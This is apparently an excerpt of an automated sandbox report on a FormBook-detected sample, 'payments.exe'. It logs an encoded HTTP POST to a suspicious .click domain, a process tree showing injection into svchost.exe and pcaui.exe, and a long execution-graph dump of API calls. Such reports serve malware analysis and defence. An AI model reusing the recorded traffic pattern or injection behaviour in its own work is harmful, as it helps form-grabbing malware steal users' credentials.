                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.3kw40881107247y.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.3kw40881107247y.click/6wln/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Ascii: bBw=tmSkXSeoQykXx6h5qGB9nbccFQGQR49tjVIrw3T1EWpyxpRDblbJ1VYfXvfvh9lsvLSv9LUyFzu09oxAeZ0AD/fA7jGchEoUQbV/0O2w15TpYQ467PO3ksCC532F/+l1le8LGpYex68FOemiRscC6uT7506TcjyWA2kS9lByFwub3mpHHl5AmtUjMQpyMOqlcA2HunOBb3wujRXfsA==
                                                                                                                        Nov 21, 2024 16:24:16.492039919 CET    955                IN         HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:16 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WDCHY61NjwdLKUF34ZwERuDzBLZfLMRMQrAaY8XqvTqomcU%2Ft%2BiqhtD4WX6UiXvD9lqXNVanh2XAU23gkqBsrM3h03B8qUlYifo5ZO9Solb0SqGb9HRyyq68sLUZPuD1%2BkCFcSifKWczICT5"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af89d93a15a3-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=643&delivery_rate=0&cwnd=109&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                        Target ID:0
                                                                                                                        Start time:10:20:06
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Users\user\Desktop\payments.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\payments.exe"
                                                                                                                        Imagebase:0xc90000
                                                                                                                        File size:1'213'440 bytes
                                                                                                                        MD5 hash:63C1545A3E20B0DC33A010E441943D0F
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:10:20:08
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\payments.exe"
                                                                                                                        Imagebase:0x900000
                                                                                                                        File size:46'504 bytes
                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:10:20:10
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe"
                                                                                                                        Imagebase:0xd00000
                                                                                                                        File size:140'800 bytes
                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:4
                                                                                                                        Start time:10:20:12
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                                                        Imagebase:0x280000
                                                                                                                        File size:135'680 bytes
                                                                                                                        MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Target ID:6
                                                                                                                        Start time:10:20:27
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe"
                                                                                                                        Imagebase:0xd00000
                                                                                                                        File size:140'800 bytes
                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:8
                                                                                                                        Start time:10:20:39
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                        Imagebase:0x7ff73feb0000
                                                                                                                        File size:676'768 bytes
                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:4%
                                                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                          Signature Coverage:9.8%
                                                                                                                          Total number of Nodes:2000
                                                                                                                          Total number of Limit Nodes:65
d01b27 94409->94410 94411 c95151 94409->94411 94413 c96b4a 48 API calls 94410->94413 94412 c9bb85 48 API calls 94411->94412 94415 c9515e _memcpy_s 94412->94415 94414 d01b34 94413->94414 94416 caee75 48 API calls 94414->94416 94415->94404 94417 d01b57 _memcpy_s 94416->94417 94419 d03c33 94418->94419 94420 c94c44 94418->94420 94419->94420 94421 d03c3c DestroyIcon 94419->94421 94420->94362 94422 cd5819 61 API calls _W_store_winword 94420->94422 94421->94420 94422->94362 94423 d0197b 94428 cadd94 94423->94428 94427 d0198a 94429 caf4ea 48 API calls 94428->94429 94430 cadd9c 94429->94430 94431 caddb0 94430->94431 94436 cadf3d 94430->94436 94435 cb0f0a 52 API calls __cinit 94431->94435 94435->94427 94437 cadda8 94436->94437 94438 cadf46 94436->94438 94440 caddc0 94437->94440 94468 cb0f0a 52 API calls __cinit 94438->94468 94441 c9d7f7 48 API calls 94440->94441 94442 caddd7 GetVersionExW 94441->94442 94443 c96a63 48 API calls 94442->94443 94444 cade1a 94443->94444 94469 cadfb4 94444->94469 94448 d024c8 94452 cadebb 94455 cadee3 94452->94455 94456 cadf31 GetSystemInfo 94452->94456 94453 cadea4 GetCurrentProcess 94486 cadf5f LoadLibraryA GetProcAddress 94453->94486 94480 cae00c 94455->94480 94457 cadf0e 94456->94457 94459 cadf1c FreeLibrary 94457->94459 94460 cadf21 94457->94460 94459->94460 94460->94431 94462 cadf29 GetSystemInfo 94465 cadf03 94462->94465 94463 cadef9 94483 cadff4 94463->94483 94465->94457 94467 cadf09 FreeLibrary 94465->94467 94467->94457 94468->94437 94470 cadfbd 94469->94470 94471 c9b18b 48 API calls 94470->94471 94472 cade22 94471->94472 94473 c96571 94472->94473 94474 c9657f 94473->94474 94475 c9b18b 48 API calls 94474->94475 94476 c9658f 94475->94476 94476->94448 94477 cadf77 94476->94477 94487 cadf89 94477->94487 94491 cae01e 94480->94491 94484 cae00c 2 API calls 94483->94484 94485 cadf01 GetNativeSystemInfo 94484->94485 94485->94465 94486->94452 94488 cadea0 94487->94488 94489 cadf92 LoadLibraryA 94487->94489 94488->94452 94488->94453 94489->94488 
94490 cadfa3 GetProcAddress 94489->94490 94490->94488 94492 cadef1 94491->94492 94493 cae027 LoadLibraryA 94491->94493 94492->94462 94492->94463 94493->94492 94494 cae038 GetProcAddress 94493->94494 94494->94492 94495 d019dd 94500 c94a30 94495->94500 94497 d019f1 94520 cb0f0a 52 API calls __cinit 94497->94520 94499 d019fb 94501 c94a40 __ftell_nolock 94500->94501 94502 c9d7f7 48 API calls 94501->94502 94503 c94af6 94502->94503 94521 c95374 94503->94521 94505 c94aff 94528 c9363c 94505->94528 94508 c9518c 48 API calls 94509 c94b18 94508->94509 94534 c964cf 94509->94534 94512 c9d7f7 48 API calls 94513 c94b32 94512->94513 94540 c949fb 94513->94540 94515 c94b43 Mailbox 94515->94497 94516 c961a6 48 API calls 94519 c94b3d _wcscat Mailbox __wsetenvp 94516->94519 94517 c9ce19 48 API calls 94517->94519 94518 c964cf 48 API calls 94518->94519 94519->94515 94519->94516 94519->94517 94519->94518 94520->94499 94554 cbf8a0 94521->94554 94524 c9ce19 48 API calls 94525 c953a7 94524->94525 94556 c9660f 94525->94556 94527 c953b1 Mailbox 94527->94505 94529 c93649 __ftell_nolock 94528->94529 94563 c9366c GetFullPathNameW 94529->94563 94531 c9365a 94532 c96a63 48 API calls 94531->94532 94533 c93669 94532->94533 94533->94508 94536 c9651b 94534->94536 94539 c964dd _memcpy_s 94534->94539 94535 caf4ea 48 API calls 94537 c94b29 94535->94537 94538 caf4ea 48 API calls 94536->94538 94537->94512 94538->94539 94539->94535 94565 c9bcce 94540->94565 94543 c94a2b 94543->94519 94544 d041cc RegQueryValueExW 94545 d041e5 94544->94545 94546 d04246 RegCloseKey 94544->94546 94547 caf4ea 48 API calls 94545->94547 94548 d041fe 94547->94548 94571 c947b7 94548->94571 94551 d04224 94553 c96a63 48 API calls 94551->94553 94552 d0423b 94552->94546 94553->94552 94555 c95381 GetModuleFileNameW 94554->94555 94555->94524 94557 cbf8a0 __ftell_nolock 94556->94557 94558 c9661c GetFullPathNameW 94557->94558 94559 c96a63 48 API calls 94558->94559 94560 c96643 94559->94560 94561 c96571 48 API calls 94560->94561 94562 c9664f 
94561->94562 94562->94527 94564 c9368a 94563->94564 94564->94531 94566 c9bce8 94565->94566 94570 c94a0a RegOpenKeyExW 94565->94570 94567 caf4ea 48 API calls 94566->94567 94568 c9bcf2 94567->94568 94569 caee75 48 API calls 94568->94569 94569->94570 94570->94543 94570->94544 94572 caf4ea 48 API calls 94571->94572 94573 c947c9 RegQueryValueExW 94572->94573 94573->94551 94573->94552 94574 d09c06 94585 cad3be 94574->94585 94576 d09c1c 94584 d09c91 Mailbox 94576->94584 94666 c91caa 49 API calls 94576->94666 94579 d09cc5 94581 d0a7ab Mailbox 94579->94581 94668 cdcc5c 86 API calls 4 library calls 94579->94668 94582 d09c71 94582->94579 94667 cdb171 48 API calls 94582->94667 94594 ca3200 94584->94594 94586 cad3ca 94585->94586 94587 cad3dc 94585->94587 94669 c9dcae 50 API calls Mailbox 94586->94669 94589 cad40b 94587->94589 94590 cad3e2 94587->94590 94670 c9dcae 50 API calls Mailbox 94589->94670 94592 caf4ea 48 API calls 94590->94592 94593 cad3d4 94592->94593 94593->94576 94671 c9bd30 94594->94671 94596 ca3267 94598 ca32f8 94596->94598 94599 d0907a 94596->94599 94658 ca3628 94596->94658 94744 cac36b 86 API calls 94598->94744 94779 cdcc5c 86 API calls 4 library calls 94599->94779 94602 ca3313 94654 ca34eb _memcpy_s Mailbox 94602->94654 94602->94658 94660 d094df 94602->94660 94676 c92b7a 94602->94676 94604 d091fa 94794 cdcc5c 86 API calls 4 library calls 94604->94794 94608 d0909a 94608->94604 94780 c9d645 94608->94780 94609 d093c5 94612 c9fe30 335 API calls 94609->94612 94610 d0926d 94798 cdcc5c 86 API calls 4 library calls 94610->94798 94614 d09407 94612->94614 94624 c9d6e9 55 API calls 94614->94624 94614->94658 94617 ca33ce 94621 d0945e 94617->94621 94622 ca3465 94617->94622 94617->94654 94619 d09220 94795 c91caa 49 API calls 94619->94795 94620 d09114 94631 d09128 94620->94631 94637 d09152 94620->94637 94804 cdc942 50 API calls 94621->94804 94627 caf4ea 48 API calls 94622->94627 94628 d09438 94624->94628 94644 ca346c 94627->94644 94803 cdcc5c 86 API calls 4 library calls 
94628->94803 94629 d0923d 94634 d09252 94629->94634 94635 d0925e 94629->94635 94790 cdcc5c 86 API calls 4 library calls 94631->94790 94633 cac3c3 48 API calls 94633->94654 94796 cdcc5c 86 API calls 4 library calls 94634->94796 94797 cdcc5c 86 API calls 4 library calls 94635->94797 94641 d09177 94637->94641 94645 d09195 94637->94645 94791 cef320 335 API calls 94641->94791 94650 ca351f 94644->94650 94683 c9e8d0 94644->94683 94647 d0918b 94645->94647 94792 cef5ee 335 API calls 94645->94792 94646 caf4ea 48 API calls 94646->94654 94647->94658 94793 cac2d6 48 API calls _memcpy_s 94647->94793 94652 c96eed 48 API calls 94650->94652 94653 ca3540 94650->94653 94652->94653 94653->94658 94659 d094b0 94653->94659 94662 ca3585 94653->94662 94654->94608 94654->94609 94654->94610 94654->94628 94654->94633 94654->94646 94654->94650 94655 d09394 94654->94655 94654->94658 94746 c9d9a0 53 API calls __cinit 94654->94746 94747 c9d8c0 53 API calls 94654->94747 94748 cac2d6 48 API calls _memcpy_s 94654->94748 94749 c9fe30 94654->94749 94799 cecda2 82 API calls Mailbox 94654->94799 94800 cd80e3 53 API calls 94654->94800 94801 c9d764 55 API calls 94654->94801 94802 c9dcae 50 API calls Mailbox 94654->94802 94657 caf4ea 48 API calls 94655->94657 94657->94609 94665 ca3635 Mailbox 94658->94665 94778 cdcc5c 86 API calls 4 library calls 94658->94778 94805 c9dcae 50 API calls Mailbox 94659->94805 94660->94658 94806 cdcc5c 86 API calls 4 library calls 94660->94806 94662->94658 94662->94660 94663 ca3615 94662->94663 94745 c9dcae 50 API calls Mailbox 94663->94745 94665->94579 94666->94582 94667->94584 94668->94581 94669->94593 94670->94593 94672 c9bd3f 94671->94672 94675 c9bd5a 94671->94675 94673 c9bdfa 48 API calls 94672->94673 94674 c9bd47 CharUpperBuffW 94673->94674 94674->94675 94675->94596 94677 c92b8b 94676->94677 94678 d0436a 94676->94678 94679 caf4ea 48 API calls 94677->94679 94680 c92b92 94679->94680 94681 c92bb3 94680->94681 94807 c92bce 48 API calls 94680->94807 94681->94617 94684 c9e8f6 
94683->94684 94717 c9e906 Mailbox 94683->94717 94685 c9ed52 94684->94685 94684->94717 94908 cae3cd 335 API calls 94685->94908 94687 c9ebc7 94688 c9ebdd 94687->94688 94909 c92ff6 16 API calls 94687->94909 94688->94654 94690 c9ed63 94690->94688 94691 c9ed70 94690->94691 94910 cae312 335 API calls Mailbox 94691->94910 94692 c9e94c PeekMessageW 94692->94717 94694 d0526e Sleep 94694->94717 94695 c9ed77 LockWindowUpdate DestroyWindow GetMessageW 94695->94688 94697 c9eda9 94695->94697 94699 d059ef TranslateMessage DispatchMessageW GetMessageW 94697->94699 94699->94699 94701 d05a1f 94699->94701 94700 c9ed21 PeekMessageW 94700->94717 94701->94688 94702 caf4ea 48 API calls 94702->94717 94703 c9ebf7 timeGetTime 94703->94717 94705 c96eed 48 API calls 94705->94717 94706 d05557 WaitForSingleObject 94711 d05574 GetExitCodeProcess CloseHandle 94706->94711 94706->94717 94707 c9ed3a TranslateMessage DispatchMessageW 94707->94700 94708 c9d7f7 48 API calls 94728 d05429 Mailbox 94708->94728 94709 c92aae 311 API calls 94709->94717 94710 d0588f Sleep 94710->94728 94711->94717 94712 c9edae timeGetTime 94911 c91caa 49 API calls 94712->94911 94714 d05733 Sleep 94714->94728 94717->94687 94717->94692 94717->94694 94717->94700 94717->94702 94717->94703 94717->94705 94717->94706 94717->94707 94717->94709 94717->94710 94717->94712 94717->94714 94721 d05445 Sleep 94717->94721 94717->94728 94730 c91caa 49 API calls 94717->94730 94735 c9fe30 311 API calls 94717->94735 94739 ca3200 311 API calls 94717->94739 94741 cdcc5c 86 API calls 94717->94741 94742 c9ce19 48 API calls 94717->94742 94743 c9d6e9 55 API calls 94717->94743 94808 c9ef00 94717->94808 94815 c9f110 94717->94815 94880 ca45e0 94717->94880 94897 cae244 94717->94897 94902 cadc5f 94717->94902 94907 c9eed0 335 API calls Mailbox 94717->94907 94912 cf8d23 48 API calls 94717->94912 94718 cadc38 timeGetTime 94718->94728 94719 d05926 GetExitCodeProcess 94722 d05952 CloseHandle 94719->94722 94723 d0593c WaitForSingleObject 94719->94723 94721->94717 
94722->94728 94723->94717 94723->94722 94724 d05432 Sleep 94724->94721 94725 cf8c4b 108 API calls 94725->94728 94726 c92c79 107 API calls 94726->94728 94728->94708 94728->94717 94728->94718 94728->94719 94728->94721 94728->94724 94728->94725 94728->94726 94729 d059ae Sleep 94728->94729 94733 c9ce19 48 API calls 94728->94733 94736 c9d6e9 55 API calls 94728->94736 94913 cd4cbe 49 API calls Mailbox 94728->94913 94914 c91caa 49 API calls 94728->94914 94915 c92aae 335 API calls 94728->94915 94916 ceccb2 50 API calls 94728->94916 94917 cd7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94728->94917 94918 cd6532 63 API calls 3 library calls 94728->94918 94729->94717 94730->94717 94733->94728 94735->94717 94736->94728 94739->94717 94741->94717 94742->94717 94743->94717 94744->94602 94745->94658 94746->94654 94747->94654 94748->94654 94750 c9fe50 94749->94750 94776 c9fe7e 94749->94776 94751 caf4ea 48 API calls 94750->94751 94751->94776 94752 cb0f0a 52 API calls __cinit 94752->94776 94753 ca1473 95837 cdcc5c 86 API calls 4 library calls 94753->95837 94754 ca146e 94755 c96eed 48 API calls 94754->94755 94774 c9ffe1 94755->94774 94756 cc97ed InterlockedDecrement 94756->94776 94757 caf4ea 48 API calls 94757->94776 94760 c96eed 48 API calls 94760->94776 94762 ca0509 95838 cdcc5c 86 API calls 4 library calls 94762->95838 94763 d0a246 94766 c96eed 48 API calls 94763->94766 94764 d0a922 94764->94654 94766->94774 94768 c9d7f7 48 API calls 94768->94776 94769 d0a873 94769->94654 94770 d0a30e 94770->94774 95835 cc97ed InterlockedDecrement 94770->95835 94772 d0a973 95839 cdcc5c 86 API calls 4 library calls 94772->95839 94774->94654 94775 d0a982 94776->94752 94776->94753 94776->94754 94776->94756 94776->94757 94776->94760 94776->94762 94776->94763 94776->94768 94776->94770 94776->94772 94776->94774 94777 ca15b5 94776->94777 95833 ca1820 335 API calls 2 library calls 94776->95833 95834 ca1d10 59 API calls Mailbox 94776->95834 95836 cdcc5c 86 API 
calls 4 library calls 94777->95836 94778->94665 94779->94602 94781 c9d654 94780->94781 94789 c9d67e 94780->94789 94782 c9d65b 94781->94782 94785 c9d6c2 94781->94785 94783 c9d6ab 94782->94783 94784 c9d666 94782->94784 94783->94789 95841 cadce0 53 API calls 94783->95841 95840 c9d9a0 53 API calls __cinit 94784->95840 94785->94783 95842 cadce0 53 API calls 94785->95842 94789->94619 94789->94620 94790->94658 94791->94647 94792->94647 94793->94604 94794->94658 94795->94629 94796->94658 94797->94658 94798->94658 94799->94654 94800->94654 94801->94654 94802->94654 94803->94658 94804->94650 94805->94660 94806->94658 94807->94681 94809 c9ef1d 94808->94809 94810 c9ef2f 94808->94810 94919 c9e3b0 335 API calls 2 library calls 94809->94919 94920 cdcc5c 86 API calls 4 library calls 94810->94920 94812 c9ef26 94812->94717 94814 d086f9 94814->94814 94816 c9f130 94815->94816 94819 c9fe30 335 API calls 94816->94819 94821 c9f199 94816->94821 94817 c9f3dd 94820 d087c8 94817->94820 94832 c9f3f2 94817->94832 94865 c9f431 Mailbox 94817->94865 94818 c9f595 94826 c9d7f7 48 API calls 94818->94826 94818->94865 94822 d08728 94819->94822 94941 cdcc5c 86 API calls 4 library calls 94820->94941 94821->94817 94821->94818 94827 c9d7f7 48 API calls 94821->94827 94859 c9f229 94821->94859 94822->94821 94938 cdcc5c 86 API calls 4 library calls 94822->94938 94824 c9fe30 335 API calls 94824->94865 94828 d087a3 94826->94828 94829 d08772 94827->94829 94940 cb0f0a 52 API calls __cinit 94828->94940 94939 cb0f0a 52 API calls __cinit 94829->94939 94830 cdcc5c 86 API calls 94830->94865 94839 c9f418 94832->94839 94942 cd9af1 48 API calls 94832->94942 94833 d08b1b 94848 d08b2c 94833->94848 94849 d08bcf 94833->94849 94835 c9d6e9 55 API calls 94835->94865 94837 c9f770 94841 d08a45 94837->94841 94858 c9f77a 94837->94858 94838 d08c53 94956 cdcc5c 86 API calls 4 library calls 94838->94956 94839->94833 94860 c9f6aa 94839->94860 94839->94865 94840 d08810 94943 ceeef8 335 API calls 94840->94943 94948 cac1af 48 API calls 
94841->94948 94842 c9fe30 335 API calls 94842->94860 94843 d08b7e 94951 cee40a 335 API calls Mailbox 94843->94951 94950 cef5ee 335 API calls 94848->94950 94953 cdcc5c 86 API calls 4 library calls 94849->94953 94850 d08beb 94954 cebdbd 335 API calls Mailbox 94850->94954 94854 ca1b90 48 API calls 94854->94865 94857 d08c00 94879 c9f537 Mailbox 94857->94879 94955 cdcc5c 86 API calls 4 library calls 94857->94955 94921 ca1b90 94858->94921 94859->94817 94859->94818 94859->94839 94859->94865 94860->94837 94860->94842 94863 c9fce0 94860->94863 94860->94865 94860->94879 94862 d08823 94862->94839 94864 d0884b 94862->94864 94863->94879 94952 cdcc5c 86 API calls 4 library calls 94863->94952 94944 ceccdc 48 API calls 94864->94944 94865->94824 94865->94830 94865->94835 94865->94838 94865->94843 94865->94850 94865->94854 94865->94863 94865->94879 94937 c9dd47 48 API calls _memcpy_s 94865->94937 94949 cc97ed InterlockedDecrement 94865->94949 94957 cac1af 48 API calls 94865->94957 94869 d08857 94871 d08865 94869->94871 94872 d088aa 94869->94872 94945 cd9b72 48 API calls 94871->94945 94875 d088a0 Mailbox 94872->94875 94946 cda69d 48 API calls 94872->94946 94873 c9fe30 335 API calls 94873->94879 94875->94873 94877 d088e7 94947 c9bc74 48 API calls 94877->94947 94879->94717 94881 ca479f 94880->94881 94882 ca4637 94880->94882 94885 c9ce19 48 API calls 94881->94885 94883 d06e05 94882->94883 94884 ca4643 94882->94884 95020 cee822 94883->95020 95019 ca4300 335 API calls _memcpy_s 94884->95019 94892 ca46e4 Mailbox 94885->94892 94888 d06e11 94889 ca4739 Mailbox 94888->94889 95060 cdcc5c 86 API calls 4 library calls 94888->95060 94889->94717 94891 ca4659 94891->94888 94891->94889 94891->94892 94960 ce6ff0 94892->94960 94969 cd6524 94892->94969 94972 c94252 94892->94972 94978 cdfa0c 94892->94978 94898 cae253 94897->94898 94900 d0df42 94897->94900 94898->94717 94899 d0df77 94900->94899 94901 d0df59 TranslateAcceleratorW 94900->94901 94901->94898 94903 cadca3 94902->94903 94904 cadc71 
94902->94904 94903->94717 94904->94903 94905 cadc96 IsDialogMessageW 94904->94905 94906 d0dd1d GetClassLongW 94904->94906 94905->94903 94905->94904 94906->94904 94906->94905 94907->94717 94908->94687 94909->94690 94910->94695 94911->94717 94912->94717 94913->94728 94914->94728 94915->94728 94916->94728 94917->94728 94918->94728 94919->94812 94920->94814 94922 ca1cf6 94921->94922 94925 ca1ba2 94921->94925 94922->94865 94923 ca1bae 94928 ca1bb9 94923->94928 94959 cac15c 48 API calls 94923->94959 94925->94923 94926 caf4ea 48 API calls 94925->94926 94927 d049c4 94926->94927 94930 caf4ea 48 API calls 94927->94930 94929 ca1c5d 94928->94929 94931 caf4ea 48 API calls 94928->94931 94929->94865 94936 d049cf 94930->94936 94932 ca1c9f 94931->94932 94933 ca1cb2 94932->94933 94958 c92925 48 API calls 94932->94958 94933->94865 94935 caf4ea 48 API calls 94935->94936 94936->94923 94936->94935 94937->94865 94938->94821 94939->94859 94940->94865 94941->94879 94942->94840 94943->94862 94944->94869 94945->94875 94946->94877 94947->94875 94948->94865 94949->94865 94950->94865 94951->94863 94952->94879 94953->94879 94954->94857 94955->94879 94956->94879 94957->94865 94958->94933 94959->94928 94961 c9936c 81 API calls 94960->94961 94962 ce702a 94961->94962 95061 c9b470 94962->95061 94964 ce703a 94965 ce705f 94964->94965 94966 c9fe30 335 API calls 94964->94966 94968 ce7063 94965->94968 95089 c9cdb9 48 API calls 94965->95089 94966->94965 94968->94889 95099 cd6ca9 GetFileAttributesW 94969->95099 94973 c9425c 94972->94973 94977 c94263 94972->94977 95103 cb35e4 94973->95103 94975 c94283 FreeLibrary 94976 c94272 94975->94976 94976->94889 94977->94975 94977->94976 94979 cdfa1c __ftell_nolock 94978->94979 94980 cdfa44 94979->94980 95497 c9d286 48 API calls 94979->95497 94982 c9936c 81 API calls 94980->94982 94983 cdfa5e 94982->94983 94984 cdfb68 94983->94984 94985 cdfa80 94983->94985 94995 cdfb92 94983->94995 95409 c941a9 94984->95409 94987 c9936c 81 API calls 94985->94987 94993 cdfa8c _wcscpy 
_wcschr 94987->94993 94989 cdfb8e 94990 c9936c 81 API calls 94989->94990 94989->94995 94992 cdfbc7 94990->94992 94991 c941a9 136 API calls 94991->94989 95433 cb1dfc 94992->95433 94997 cdfade _wcscat 94993->94997 94998 cdfab0 _wcscat _wcscpy 94993->94998 94995->94889 94996 cdfbeb _wcscat _wcscpy 95007 c9936c 81 API calls 94996->95007 94999 c9936c 81 API calls 94997->94999 95001 c9936c 81 API calls 94998->95001 95000 cdfafc _wcscpy 94999->95000 95498 cd72cb GetFileAttributesW 95000->95498 95001->94997 95003 cdfb1c __wsetenvp 95003->94995 95004 c9936c 81 API calls 95003->95004 95005 cdfb48 95004->95005 95499 cd60dd 77 API calls 4 library calls 95005->95499 95009 cdfc82 95007->95009 95008 cdfb5c 95008->94995 95436 cd690b 95009->95436 95011 cdfca2 95012 cd6524 3 API calls 95011->95012 95013 cdfcb1 95012->95013 95014 c9936c 81 API calls 95013->95014 95016 cdfce2 95013->95016 95015 cdfccb 95014->95015 95442 cdbfa4 95015->95442 95018 c94252 84 API calls 95016->95018 95018->94995 95019->94891 95021 cee84e 95020->95021 95022 cee868 95020->95022 95825 cdcc5c 86 API calls 4 library calls 95021->95825 95826 ceccdc 48 API calls 95022->95826 95025 cee871 95026 c9fe30 334 API calls 95025->95026 95027 cee8cf 95026->95027 95028 cee96a 95027->95028 95030 cee916 95027->95030 95059 cee860 Mailbox 95027->95059 95029 cee978 95028->95029 95033 cee9c7 95028->95033 95828 cda69d 48 API calls 95029->95828 95827 cd9b72 48 API calls 95030->95827 95032 cee949 95035 ca45e0 334 API calls 95032->95035 95036 c9936c 81 API calls 95033->95036 95033->95059 95035->95059 95038 cee9e1 95036->95038 95037 cee99b 95829 c9bc74 48 API calls 95037->95829 95041 c9bdfa 48 API calls 95038->95041 95040 cee9a3 Mailbox 95043 ca3200 334 API calls 95040->95043 95042 ceea05 CharUpperBuffW 95041->95042 95044 ceea1f 95042->95044 95043->95059 95045 ceea26 95044->95045 95046 ceea72 95044->95046 95830 cd9b72 48 API calls 95045->95830 95047 c9936c 81 API calls 95046->95047 95048 ceea7a 95047->95048 95831 c91caa 49 API calls 
